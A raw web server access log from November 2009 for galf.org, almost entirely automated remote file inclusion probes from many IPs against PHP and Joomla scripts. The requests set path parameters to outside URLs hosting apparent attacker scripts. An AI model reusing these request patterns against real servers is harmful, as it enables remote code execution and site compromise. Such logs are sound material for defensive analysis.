83.15.235.58 - - [09/Nov/2009:05:28:33 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:05:28:34 -0800] "GET /logs/access_090928.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:05:28:39 -0800] "GET /logs/access_090928.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:05:28:40 -0800] "GET /logs/access_090907.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:05:28:45 -0800] "GET /logs/access_090907.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.65.110.157 - - [09/Nov/2009:05:29:04 -0800] "GET /logs/access_090727.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.65.110.157 - - [09/Nov/2009:05:29:04 -0800] "GET /logs/access_090309.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.15.235.58 - - [09/Nov/2009:05:29:11 -0800] "GET /LABIA23/figuras3.jpg HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.galf.org"
83.15.235.58 - - [09/Nov/2009:05:29:32 -0800] "GET /logs/access_090706.log HTTP/1.1" 200 6967068 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.galf.org"
83.15.235.58 - - [09/Nov/2009:05:29:51 -0800] "GET /logs/scripts.log HTTP/1.1" 200 1774835 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:05:37:49 -0800] "GET /logs/access_090907.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:05:38:46 -0800] "GET /logs/access_090525.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:41:04 -0800] "GET /viewbody.html?code=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:41:04 -0800] "GET /logs/access_091005.log//viewbody.html?code=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:41:04 -0800] "GET /logs//viewbody.html?code=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:41:07 -0800] "GET /viewbody.html?code=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:41:07 -0800] "GET /logs//viewbody.html?code=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:41:07 -0800] "GET /logs/access_091005.log%20%20//viewbody.html?code=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:41:56 -0800] "GET /logs/access_091005.log//viewbody.html?code=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:41:56 -0800] "GET /logs//viewbody.html?code=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.137.163.133 - - [09/Nov/2009:05:42:12 -0800] "GET /logs/access_090223.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1" "www.galf.org"
69.65.43.107 - - [09/Nov/2009:05:42:17 -0800] "GET /logs/access_090907.log//setup.php?dir=http://hyunhaedang.com/zb41//skin/happycast_category_red/setup_pages.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.65.43.107 - - [09/Nov/2009:05:42:17 -0800] "GET /setup.php?dir=http://hyunhaedang.com/zb41//skin/happycast_category_red/setup_pages.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.65.43.107 - - [09/Nov/2009:05:42:17 -0800] "GET /logs//setup.php?dir=http://hyunhaedang.com/zb41//skin/happycast_category_red/setup_pages.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:43:11 -0800] "GET /logs/access_090928.log//viewbody.html?code=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:05:43:18 -0800] "GET /logs/access_091012.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
66.34.10.1 - - [09/Nov/2009:05:43:39 -0800] "GET /logs/access_090824.log%20%20//viewbody.html?code=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.45.30 - - [09/Nov/2009:05:44:10 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.45.30 - - [09/Nov/2009:05:44:10 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.45.30 - - [09/Nov/2009:05:44:10 -0800] "GET /logs/access.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.45.30 - - [09/Nov/2009:05:44:17 -0800] "GET /logs/access_090720.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.47.10 - - [09/Nov/2009:05:44:45 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.47.10 - - [09/Nov/2009:05:44:46 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.47.10 - - [09/Nov/2009:05:44:46 -0800] "GET /logs/access.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.65.43.107 - - [09/Nov/2009:05:44:48 -0800] "GET /logs/access.log//setup.php?dir=http://hyunhaedang.com/zb41//skin/happycast_category_red/setup_pages.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.47.10 - - [09/Nov/2009:05:44:55 -0800] "GET /logs/access_090720.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.47.10 - - [09/Nov/2009:05:46:55 -0800] "GET /logs/access_090727.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.45.30 - - [09/Nov/2009:05:47:03 -0800] "GET /logs/access_090727.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.47.10 - - [09/Nov/2009:05:47:51 -0800] "GET /logs/access_090817.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
205.209.53.68 - - [09/Nov/2009:05:48:51 -0800] "GET /logs/access_090928.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://indo.home.ro/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
205.209.53.68 - - [09/Nov/2009:05:48:51 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://indo.home.ro/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
205.209.53.68 - - [09/Nov/2009:05:48:51 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://indo.home.ro/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
205.209.53.68 - - [09/Nov/2009:05:48:58 -0800] "GET /logs/access_090907.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://indo.home.ro/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
157.100.45.30 - - [09/Nov/2009:05:49:07 -0800] "GET /logs/access_090817.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.158.167.98 - - [09/Nov/2009:05:50:14 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe5.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.158.167.98 - - [09/Nov/2009:05:50:17 -0800] "GET /logs/access_090511.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe5.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.158.167.98 - - [09/Nov/2009:05:50:45 -0800] "GET /logs/access_090601.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe5.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:50:48 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:50:48 -0800] "GET /logs/?sourcedir=http://www.hackengine.net/scan/id1? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:50:48 -0800] "GET /?sourcedir=http://www.hackengine.net/scan/id1? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
212.158.167.98 - - [09/Nov/2009:05:51:09 -0800] "GET /logs/access_090511.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe5.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.158.167.98 - - [09/Nov/2009:05:51:14 -0800] "GET /logs/access_090601.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe5.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.247.200.12 - - [09/Nov/2009:05:52:21 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.247.200.12 - - [09/Nov/2009:05:52:21 -0800] "GET /logs/access.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.247.200.12 - - [09/Nov/2009:05:52:21 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.247.200.12 - - [09/Nov/2009:05:52:40 -0800] "GET /logs/access_090720.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:52:52 -0800] "GET /main.php?sayfa=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:52:52 -0800] "GET /logs/access_090608.log//main.php?sayfa=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:52:53 -0800] "GET /logs//main.php?sayfa=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:52:56 -0800] "GET /logs/access_090803.log//main.php?sayfa=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:53:18 -0800] "GET /main.php?sayfa=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:53:18 -0800] "GET /logs//main.php?sayfa=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:53:18 -0800] "GET /logs/access_090608.log%20%20//main.php?sayfa=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:54:20 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:05:54:57 -0800] "GET /logs/access_090518.log/?sourcedir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:05:54:57 -0800] "GET /logs/?sourcedir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:05:54:58 -0800] "GET /?sourcedir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
212.158.167.98 - - [09/Nov/2009:05:55:18 -0800] "GET /logs/access_090615.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe5.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:05:55:21 -0800] "GET /logs/access_090921.log/?sourcedir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.158.167.98 - - [09/Nov/2009:05:55:47 -0800] "GET /logs/access_090907.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe5.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [09/Nov/2009:05:56:23 -0800] "GET /logs//include/print_category.php?dir=http://www.gomeins.de//styles/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [09/Nov/2009:05:56:23 -0800] "GET /logs/access_090928.log//include/print_category.php?dir=http://www.gomeins.de//styles/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [09/Nov/2009:05:56:23 -0800] "GET /include/print_category.php?dir=http://www.gomeins.de//styles/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [09/Nov/2009:05:57:03 -0800] "GET /logs/access_090622.log//include/print_category.php?dir=http://www.gomeins.de//styles/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [09/Nov/2009:05:57:37 -0800] "GET /logs/access_090504.log//include/print_category.php?dir=http://www.gomeins.de//styles/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [09/Nov/2009:05:57:37 -0800] "GET /include/print_category.php?dir=http://www.gomeins.de//styles/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [09/Nov/2009:05:57:37 -0800] "GET /logs//include/print_category.php?dir=http://www.gomeins.de//styles/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:58:03 -0800] "GET /logs/access_090608.log//main.php?sayfa=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:58:03 -0800] "GET /main.php?sayfa=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:58:03 -0800] "GET /logs//main.php?sayfa=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:05:58:04 -0800] "GET /logs/access_090803.log//main.php?sayfa=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.158.167.98 - - [09/Nov/2009:05:58:43 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe5.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.158.167.98 - - [09/Nov/2009:05:58:43 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe5.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.158.167.98 - - [09/Nov/2009:05:58:43 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://cafe5.fileave.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.70.35.48 - - [09/Nov/2009:05:59:33 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [09/Nov/2009:05:59:33 -0800] "GET /logs/access.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [09/Nov/2009:05:59:33 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:05:59:40 -0800] "GET /logs/access_090720.log//?path%5Bdocroot%5D=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:05:59:40 -0800] "GET /logs//?path%5Bdocroot%5D=http://approvedjobs.com/.safe??? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:05:59:40 -0800] "GET /?path%5Bdocroot%5D=http://approvedjobs.com/.safe??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:05:59:50 -0800] "GET /logs/access_090525.log//?path%5Bdocroot%5D=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
195.70.35.48 - - [09/Nov/2009:05:59:50 -0800] "GET /logs/access_090720.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [09/Nov/2009:05:59:51 -0800] "GET /logs//include/print_category.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [09/Nov/2009:05:59:54 -0800] "GET /include/print_category.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [09/Nov/2009:05:59:54 -0800] "GET /logs/access_090928.log%20%20//include/print_category.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:06:01:45 -0800] "GET /logs/access_090615.log/?sourcedir=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:06:06:54 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:06:06:55 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:06:06:55 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [09/Nov/2009:06:07:33 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.thelumosalliance.com/cometchat/.../x???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [09/Nov/2009:06:07:34 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.thelumosalliance.com/cometchat/.../x???? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [09/Nov/2009:06:07:34 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.thelumosalliance.com/cometchat/.../x???? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [09/Nov/2009:06:07:44 -0800] "GET /logs/access_090727.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:06:08:19 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:06:08:20 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:06:08:20 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:06:08:21 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:06:08:21 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:06:08:22 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:06:08:22 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.254.134.50 - - [09/Nov/2009:06:08:50 -0800] "GET /view.php?dir=http://www.sjobergsbygg.nu/bilder/struktur/eq1.txt????&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
85.111.12.199 - - [09/Nov/2009:06:08:51 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.thelumosalliance.com/cometchat/.../x???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [09/Nov/2009:06:08:51 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.thelumosalliance.com/cometchat/.../x???? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
